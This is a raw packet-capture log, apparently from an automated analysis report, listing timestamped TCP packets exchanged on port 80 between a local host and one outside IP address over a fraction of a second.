Apr 26, 2024 17:11:13.099436998 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.099457979 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099534035 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.099606991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099692106 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099730968 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099766016 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099786997 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.099802971 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099812984 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.099869967 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099906921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099917889 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.099944115 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099999905 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.100013018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.100081921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.100133896 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.102024078 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.102061987 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.102098942 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.102112055 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.102133989 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.102176905 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.102288008 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.102384090 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.102436066 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.102454901 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.102524042 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.102572918 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.102612019 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103072882 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103123903 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103130102 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.103193998 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103255987 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103302956 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.103305101 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103347063 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.103374958 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103523970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103569031 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.103574991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103645086 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103699923 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103720903 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.103811026 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103858948 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.103888988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103928089 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.103967905 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.103995085 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104063988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104152918 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104197025 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.104212999 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104254961 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.104281902 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104316950 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104383945 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104427099 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.104476929 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104513884 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104549885 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104561090 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.104589939 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.104617119 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104716063 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104752064 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.104770899 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.105612040 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.105667114 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.105881929 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.105947018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.105990887 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.105999947 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.106039047 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.106106043 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.106125116 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.106190920 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.106240988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.106277943 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.106307030 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.106317043 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.106395006 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.106431961 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.106481075 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.106501102 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.106585979 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.106622934 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.106636047 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.107057095 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.107094049 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.107115984 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.107158899 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.107278109 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.107283115 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.107918978 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.107956886 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.107963085 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.108026028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108093023 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108141899 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108145952 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.108179092 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108181953 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.108247995 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108283043 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108285904 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.108319998 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108376980 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.108388901 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108427048 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108479023 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108522892 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.108546019 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108582020 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108584881 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.108649969 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108685970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108726025 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.108753920 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108789921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108827114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108831882 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.108867884 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.108880043 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108947039 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.108983040 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.109019995 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.109025002 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.109076977 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.109087944 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.109184980 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.109251022 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.109251976 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.109679937 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.109739065 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.109772921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.109810114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.109850883 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.271748066 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.271795034 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.271852970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.271853924 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.343089104 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.343135118 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.343172073 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.343180895 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.343209028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.343245983 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.343250990 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.343283892 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.343316078 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.343319893 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.343357086 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.343405962 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.343413115 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.343447924 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.343482971 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.344326019 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.344366074 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.344379902 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.344402075 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.344438076 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.344458103 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.346108913 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.346151114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.346174955 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.346187115 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.346224070 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.346235991 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.346260071 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.346343040 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.346492052 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.346529961 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.346566916 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.346621037 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.346790075 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.346848011 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.346865892 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.346926928 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.346980095 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347023010 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347029924 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347058058 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347094059 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347105980 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347130060 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347145081 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347174883 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347209930 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347246885 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347253084 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347282887 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347301006 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347317934 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347353935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347366095 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347390890 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347426891 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347461939 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347476006 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347497940 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347498894 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347534895 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347569942 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347599030 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347605944 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347641945 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347656012 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347676992 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347712994 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347747087 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347755909 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347784996 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347788095 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347820044 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347856998 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347862005 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.347893953 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347929955 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347969055 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.347969055 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.348005056 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348007917 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.348041058 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348077059 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348129988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348162889 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.348166943 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348182917 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.348202944 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348237991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348247051 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.348273993 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348309994 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348345041 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348365068 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.348381996 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348387957 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.348417997 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348453045 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348459959 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.348489046 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348526955 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348541975 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.348660946 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348700047 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348737001 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348737001 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.348773003 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348788023 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.348809004 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348845005 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.348855019 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350147963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350188017 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350209951 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350227118 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350229979 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350264072 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350276947 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350306988 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350337982 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350373983 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350389004 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350409031 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350430012 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350444078 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350451946 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350481987 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350491047 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350517035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350533009 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350552082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350562096 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350588083 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350594997 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350641966 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350644112 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350698948 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350711107 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350734949 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350745916 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350771904 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350783110 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350807905 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350816965 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350843906 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350857019 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350878954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350889921 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350914001 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350927114 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.350951910 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.350960970 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.351010084 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.354710102 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.354727983 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.354784966 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.354819059 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.355093002 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.355110884 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.355140924 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.355170965 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.357165098 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357182980 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357198954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357214928 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357223034 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.357233047 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357245922 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.357266903 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357281923 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.357304096 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.357336044 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357352972 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357367992 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357383013 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.357383966 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357404947 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.357424021 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.357429028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357456923 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.357486963 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.357893944 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357939005 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.357939959 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357956886 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.357991934 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.358021975 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.359460115 CEST	80	49713	176.97.76.106	192.168.2.5
